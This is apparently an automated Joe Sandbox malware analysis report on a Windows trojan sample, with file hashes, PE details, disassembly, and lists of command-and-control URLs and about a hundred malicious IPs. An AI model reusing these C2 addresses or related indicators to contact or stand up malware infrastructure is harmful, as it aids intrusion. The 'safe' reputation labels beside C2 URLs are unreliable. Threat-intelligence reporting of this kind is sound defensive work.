http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/Q	0%	Avira URL Cloud	safe
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW//	0%	Avira URL Cloud	safe
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/)	0%	Avira URL Cloud	safe
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/(	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	false		high
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/&	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/750%	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/x	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/s	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/v5s%	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/contact/	svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/6	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/v	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/develop	svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	false		high
http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1	svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	false		high
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0//tItqVujt/djBiHrQbZlsTCQpMosu/bqx	KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/K	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	svchost.exe, 0000000B.00000002.764765099.00000270E64EC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 0000000B.00000003.750574103.00000270E6B69000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp, KBDHU1.exe, 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://107.170.146.252:8080/yYXdTFdZ0/DfPFFYTbrJqLTvn/OUI1VCQMV00VFH/tItqVujt/djBiHrQbZlsTCQpMosu/bq	KBDHU1.exe, 00000005.00000003.819264277.000000000073D000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.906600906.00000000032D0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://88.153.35.32/jGQKlmkSoBBnbOFUuBG/9vXEjmEP4GznF/	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp, KBDHU1.exe, 00000005.00000003.819264277.000000000073D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	false		high
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/V	KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/A:	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/)5Z%	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/R	KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://202.141.243.254:443/ZTcUlmgOk/ZdXDncN6R/	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/Q	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://173.212.214.235:7080/hO5dkT/0EDa/Mr7phtrE381/twO6hvq/FJxtI0/	KBDHU1.exe, 00000005.00000002.906773666.0000000003496000.00000004.00000001.sdmp, KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000000B.00000003.741257022.00000270E6B71000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000B.00000003.750528544.00000270E6B94000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.750587188.00000270E6B79000.00000004.00000001.sdmp	false		high
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW//	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://75.143.247.51/8252jRzGZ1ESaMRhm/ZvhlIyMvd/AluncWtMpTGrO/1f9mgY7KN8T/YXKrl/nDV3S4P6PnM/)	KBDHU1.exe, 00000005.00000002.905903392.000000000073B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://167.114.153.111:8080/K5ZJo5zQ/HcfJcbQPbzw55g8/vSjTj/8XztFu/4uKa0U6RLsViXlFaMpW/(	KBDHU1.exe, 00000005.00000002.905885561.0000000000720000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
194.4.58.192	unknown	Kazakhstan	202958	HOSTER-KZ	true
102.182.93.220	unknown	South Africa	37611	AfrihostZA	true
95.9.5.93	unknown	Turkey	9121	TTNETTR	true
94.200.114.161	unknown	United Arab Emirates	15802	DU-AS1AE	true
72.186.136.247	unknown	United States	33363	BHN-33363US	true
115.94.207.99	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
89.121.205.18	unknown	Romania	9050	RTDBucharestRomaniaRO	true
24.133.106.23	unknown	Turkey	47524	TURKSAT-ASTR	true
216.139.123.119	unknown	United States	395582	GRM-NETWORKUS	true
200.116.145.225	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
138.68.87.218	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
172.105.13.66	unknown	United States	63949	LINODE-APLinodeLLCUS	true
220.245.198.194	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
67.170.250.203	unknown	United States	7922	COMCAST-7922US	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
24.178.90.49	unknown	United States	20115	CHARTER-20115US	true
94.23.237.171	unknown	France	16276	OVHFR	true
187.161.206.24	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
41.185.28.84	unknown	South Africa	36943	GridhostZA	true
194.190.67.75	unknown	Russian Federation	50804	BESTLINE-NET-PROTVINORU	true
186.74.215.34	unknown	Panama	11556	CableWirelessPanamaPA	true
202.134.4.216	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
120.150.218.241	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
202.134.4.211	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
62.30.7.67	unknown	United Kingdom	5089	NTLGB	true
123.142.37.166	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
75.143.247.51	unknown	United States	20115	CHARTER-20115US	true
49.3.224.99	unknown	Australia	4804	MPX-ASMicroplexPTYLTDAU	true
162.241.140.129	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
124.41.215.226	unknown	Nepal	17501	WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNP	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
119.59.116.21	unknown	Thailand	56067	METRABYTE-TH453LadplacoutJorakhaebuaTH	true
113.61.66.94	unknown	Australia	45510	TELCOINABOX-AULevel109HunterStreetAU	true
96.245.227.43	unknown	United States	701	UUNETUS	true
172.91.208.86	unknown	United States	20001	TWC-20001-PACWESTUS	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
194.187.133.160	unknown	Bulgaria	13124	IBGCBG	true
121.7.31.214	unknown	Singapore	9506	SINGTEL-FIBRESingtelFibreBroadbandSG	true
112.185.64.233	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
61.76.222.210	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
46.105.131.79	unknown	France	16276	OVHFR	true
27.114.9.93	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
74.214.230.200	unknown	United States	36728	EMERYTELCOMUS	true
190.162.215.233	unknown	Chile	22047	VTRBANDAANCHASACL	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
154.91.33.137	unknown	Seychelles	137443	ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK	true
107.170.146.252	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
93.147.212.206	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
172.86.188.251	unknown	Canada	32489	AMANAHA-NEWCA	true
50.35.17.13	unknown	United States	27017	ZIPLY-FIBER-LEGACY-ASNUS	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
75.188.96.231	unknown	United States	10796	TWC-10796-MIDWESTUS	true
167.114.153.111	unknown	Canada	16276	OVHFR	true
37.179.204.33	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
2.58.16.89	unknown	Latvia	64421	SERTEX-ASLV	true
59.125.219.109	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	true
62.171.142.179	unknown	United Kingdom	51167	CONTABODE	true
123.176.25.234	unknown	Maldives	7642	DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMV	true
50.91.114.38	unknown	United States	33363	BHN-33363US	true
61.33.119.226	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
217.123.207.149	unknown	Netherlands	33915	TNF-ASNL	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
173.63.222.65	unknown	United States	701	UUNETUS	true
24.179.13.119	unknown	United States	20115	CHARTER-20115US	true
173.212.214.235	unknown	Germany	51167	CONTABODE	true
47.36.140.164	unknown	United States	20115	CHARTER-20115US	true
110.142.236.207	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
49.50.209.131	unknown	New Zealand	55853	MEGATEL-AS-APMegatelNZ	true
190.108.228.27	unknown	Argentina	27751	NeunetSAAR	true
202.141.243.254	unknown	Pakistan	9260	MULTINET-AS-APMultinetPakistanPvtLtdPK	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
78.188.106.53	unknown	Turkey	9121	TTNETTR	true
71.15.245.148	unknown	United States	20115	CHARTER-20115US	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
217.20.166.178	unknown	Ukraine	1820	WNETUS	true
24.230.141.169	unknown	United States	11232	MIDCO-NETUS	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
134.209.144.106	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
186.70.56.94	unknown	Ecuador	14522	SatnetEC	true
97.82.79.83	unknown	United States	20115	CHARTER-20115US	true
190.12.119.180	unknown	Argentina	11014	CPSAR	true
139.162.60.124	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
172.104.97.173	unknown	United States	63949	LINODE-APLinodeLLCUS	true
184.180.181.202	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
176.113.52.6	unknown	Russian Federation	8712	INTA-ASRU	true
201.241.127.190	unknown	Chile	22047	VTRBANDAANCHASACL	true
68.115.186.26	unknown	United States	20115	CHARTER-20115US	true
24.137.76.62	unknown	Canada	11260	EASTLINK-HSICA	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	437123
Start date:	19.06.2021
Start time:	12:34:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	boI88C399w.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@9/0@0/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 46.3% (good quality ratio 40.6%) Quality average: 61% Quality standard deviation: 30.1%
HCA Information:	Successful, ratio: 81% Number of executed functions: 47 Number of non-executed functions: 89
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 204.79.197.200, 13.107.21.200, 20.82.209.183, 13.107.253.254, 13.107.3.254, 40.88.32.150, 52.113.196.254, 23.211.6.115, 168.61.161.212, 20.54.7.98, 40.112.88.60, 20.54.104.15, 173.222.108.210, 20.82.210.154, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, t-9999.fb-t-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, t-ring.t-9999.t-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:34:54	API Interceptor	1067x Sleep call for process: splwow64.exe modified
12:35:39	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
216.139.123.119	2ojdmC51As.exe	Get hash	malicious	Browse
200.116.145.225	2ojdmC51As.exe	Get hash	malicious	Browse	200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/
200.116.145.225	GM8716863026AA.doc	Get hash	malicious	Browse	200.116.145.225:443/eHRi0AsvmChNb0B/Sq2LBDG3K/dHE8SMLlJOlFGym/g6iocDdP0QPHR/
194.4.58.192	v8iFmF7XPp.dll	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
102.182.93.220	2ojdmC51As.exe	Get hash	malicious	Browse
95.9.5.93	v8iFmF7XPp.dll	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
94.200.114.161	test-emotet.exe	Get hash	malicious	Browse	94.200.114.161/
72.186.136.247	v8iFmF7XPp.dll	Get hash	malicious	Browse
115.94.207.99	https://contentsxx.xsrv.jp/academia/parts_service/7xg/	Get hash	malicious	Browse	115.94.207.99:443/OUnj/nu5Sn5pH6W/XCxNN4goRNgqaQshv/BH9p/alZ3dnjhwqocs6Wj/
89.121.205.18	2ojdmC51As.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTER-KZ	jax.k.dll	Get hash	malicious	Browse	185.100.65.29
	0519_3361871008218.doc	Get hash	malicious	Browse	185.100.65.29
	fax.f.dll	Get hash	malicious	Browse	185.100.65.29
	0513_3111026702554.doc	Get hash	malicious	Browse	185.100.65.29
	0513_1360918519077.doc	Get hash	malicious	Browse	185.100.65.29
	581a98e7_by_Libranalysis.docm	Get hash	malicious	Browse	185.100.65.29
	Win32.exe	Get hash	malicious	Browse	185.113.134.179
	jers.dll	Get hash	malicious	Browse	185.100.65.29
	v8iFmF7XPp.dll	Get hash	malicious	Browse	194.4.58.192
	wininit.dll	Get hash	malicious	Browse	185.100.65.29
	0408_391585988029.doc	Get hash	malicious	Browse	185.100.65.29
	msals.pumpl.dll	Get hash	malicious	Browse	185.100.65.29
	msals.pumpl.dll	Get hash	malicious	Browse	185.100.65.29
	msals.dll	Get hash	malicious	Browse	185.100.65.29
	NvContainer.exe	Get hash	malicious	Browse	185.113.134.179
	0318_45657944978421.doc	Get hash	malicious	Browse	185.100.65.29
	2ojdmC51As.exe	Get hash	malicious	Browse	194.4.58.192
	FileZilla_3.50.0_win64-setup.exe	Get hash	malicious	Browse	185.116.194.200
	0304_87496944093261.doc	Get hash	malicious	Browse	185.100.65.29
	0304_56958375050481.doc	Get hash	malicious	Browse	185.100.65.29
TTNETTR	invoice-H9247.docx	Get hash	malicious	Browse	78.186.110.14
	2dhfmRiWST.exe	Get hash	malicious	Browse	85.99.227.85
	aduYorlpGH.exe	Get hash	malicious	Browse	85.99.227.85
	sample1.doc	Get hash	malicious	Browse	78.186.65.230
	tpdwIENhDh.exe	Get hash	malicious	Browse	78.180.177.193
	17D54F646D676B09788537F84FC3BFC8699D78A6B11B9.exe	Get hash	malicious	Browse	88.229.252.115
	9cf2c56e_by_Libranalysis.exe	Get hash	malicious	Browse	88.249.120.205
	8UsA.sh	Get hash	malicious	Browse	78.188.19.132
	nT7K5GG5km	Get hash	malicious	Browse	85.110.95.80
	ldr.sh	Get hash	malicious	Browse	88.225.138.206
	qJiGYEJs.exe	Get hash	malicious	Browse	78.189.219.196
	v8iFmF7XPp.dll	Get hash	malicious	Browse	85.105.111.166
	VizZ3QTQMu.exe	Get hash	malicious	Browse	195.174.29.189
	g9ldZ16mvPSd1Z1.exe	Get hash	malicious	Browse	88.241.166.6
	2ojdmC51As.exe	Get hash	malicious	Browse	85.105.111.166
	4xPTS0oLmE.exe	Get hash	malicious	Browse	95.14.95.126
	MiAouAtLEk.exe	Get hash	malicious	Browse	88.229.0.210
	vB2sN14K0Y.exe	Get hash	malicious	Browse	78.189.230.30
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse	85.105.111.166
	Io8ic2291n.doc	Get hash	malicious	Browse	81.215.230.173
AfrihostZA	BfdkXo6xoH.exe	Get hash	malicious	Browse	154.0.171.107
	85cUZZtEFA.xls	Get hash	malicious	Browse	154.0.164.210
	85cUZZtEFA.xls	Get hash	malicious	Browse	154.0.164.210
	85cUZZtEFA.xls	Get hash	malicious	Browse	154.0.164.210
	Document_38047842.xls	Get hash	malicious	Browse	154.0.164.210
	Fax_Doc#01_5.html	Get hash	malicious	Browse	197.242.146.206
	New Order.exe	Get hash	malicious	Browse	154.0.165.45
	sample1.doc	Get hash	malicious	Browse	41.76.213.144
	Booking Confirmation.xlsx	Get hash	malicious	Browse	169.1.24.161
	HU4TEm4Vr7.exe	Get hash	malicious	Browse	169.0.142.82
	product specification.xlsx	Get hash	malicious	Browse	169.1.24.244
	ppc_unpacked	Get hash	malicious	Browse	169.214.149.159
	MGuvcs6Ocz	Get hash	malicious	Browse	169.208.248.210
	z3hir.bin	Get hash	malicious	Browse	169.128.215.34
	IMG001.exe	Get hash	malicious	Browse	169.106.68.226
	NdBLyH2h5d.exe	Get hash	malicious	Browse	169.1.24.244
	YPJ9DZYIpO	Get hash	malicious	Browse	169.107.27.65
	PO#41000055885.exe	Get hash	malicious	Browse	154.0.167.80
	2ojdmC51As.exe	Get hash	malicious	Browse	102.182.93.220
	Our REVISED Order 1032021.exe	Get hash	malicious	Browse	154.0.173.248

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.556948031769578
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	boI88C399w.exe
File size:	581632
MD5:	0a82064af051bad014b77038d60474b6
SHA1:	f7bf190091d5fe307cfaeed630eeb341c935bda0
SHA256:	8f165a26d7e9ad72cb0d51cf01076cc4b0099a244cd4e702645d36dc788dd0cc
SHA512:	8d8c3d9479826597c7cebd1f0c6ff5556af757774af4e606e9958eefd38b93aeacc3142b0eb938430abacdc9c80c84f7fe68bc573cd57faee7612d0b71579302
SSDEEP:	12288:ggyDT8PLvvaKrtURPnMXSVL6ZRwO+4DQDf2TPexaaiWgyDTj1cib:gJDT8PjiKZcPM86rw0WJDTj1cY
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...B-._..................... .......!............@................

File Icon


Icon Hash:	60e0e4b4b4cce062

Static PE Info

General
Entrypoint:	0x4021e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F992D42 [Wed Oct 28 08:35:14 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ee32a7d07aff9fd88159f3d8028f0500

Entrypoint Preview

Instruction
push 004022F0h
call 00007F0840573AB5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dl, al
clc
imul ebp, dword ptr [edx-50h], 52h
add al, 47h
scasb
lahf
and byte ptr [edx], ah
mov ah, F9h
xchg byte ptr [edx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+45h], dl
dec ebx
push eax
popad
imul ebp, dword ptr [esi+74h], 00000032h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add al, byte ptr [eax]
rol byte ptr [ecx+00000040h], 00000000h
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6b174	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x20b58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
